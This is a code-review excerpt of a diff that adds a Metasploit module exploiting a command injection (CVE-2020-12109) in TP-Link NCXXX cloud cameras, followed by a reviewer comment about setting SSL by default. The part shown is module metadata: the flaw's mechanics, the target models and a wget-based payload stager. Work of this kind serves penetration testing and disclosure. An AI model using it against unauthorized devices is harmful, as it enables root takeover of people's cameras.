modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb

```diff
@@ -0,0 +1,160 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'TP-Link Cloud Cameras NCXXX Bonjour Command Injection',
+        'Description' => %q{
+          TP-Link cloud cameras NCXXX series (NC200, NC210, NC220, NC230,
+          NC250, NC260, NC450) are vulnerable to an authenticated command
+          injection. In all devices except NC210, despite a check on the name length in
+          swSystemSetProductAliasCheck, no other checks are in place in order
+          to prevent shell metacharacters from being introduced. The system name
+          would then be used in swBonjourStartHTTP as part of a shell command
+          where arbitrary commands could be injected and executed as root. NC210 devices
+          cannot be exploited directly via /setsysname.cgi due to proper input
+          validation. NC210 devices are still vulnerable since swBonjourStartHTTP
+          did not perform any validation when reading the alias name from the
+          configuration file. The configuration file can be written, and code
+          execution can be achieved by combining this issue with CVE-2020-12110.
+        },
+        'Author' => ['Pietro Oliva <pietroliva[at]gmail.com>'],
+        'License' => MSF_LICENSE,
+        'References' =>
+        [
+          [ 'URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12109' ],
+          [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2020-12109' ],
+          [ 'URL', 'https://seclists.org/fulldisclosure/2020/May/2' ],
+          [ 'CVE', '2020-12109']
+        ],
+        'DisclosureDate' => '2020-04-29',
+        'Platform' => 'linux',
+        'Arch' => ARCH_MIPSLE,
+        'Targets' =>
+        [
+          [
+            'TP-Link NC200, NC220, NC230, NC250',
+            {
+              'Arch' => ARCH_MIPSLE,
+              'Platform' => 'linux',
+              'CmdStagerFlavor' => [ 'wget' ]
+            }
+          ],
+          [
+            'TP-Link NC260, NC450',
+            {
+              'Arch' => ARCH_MIPSLE,
+              'Platform' => 'linux',
+              'CmdStagerFlavor' => [ 'wget' ]
```

Comment:
Here's where you can set the `SSL` value for the target.

```suggestion
              'CmdStagerFlavor' => [ 'wget' ],
              'DefaultOptions' => { 'SSL' => true }
```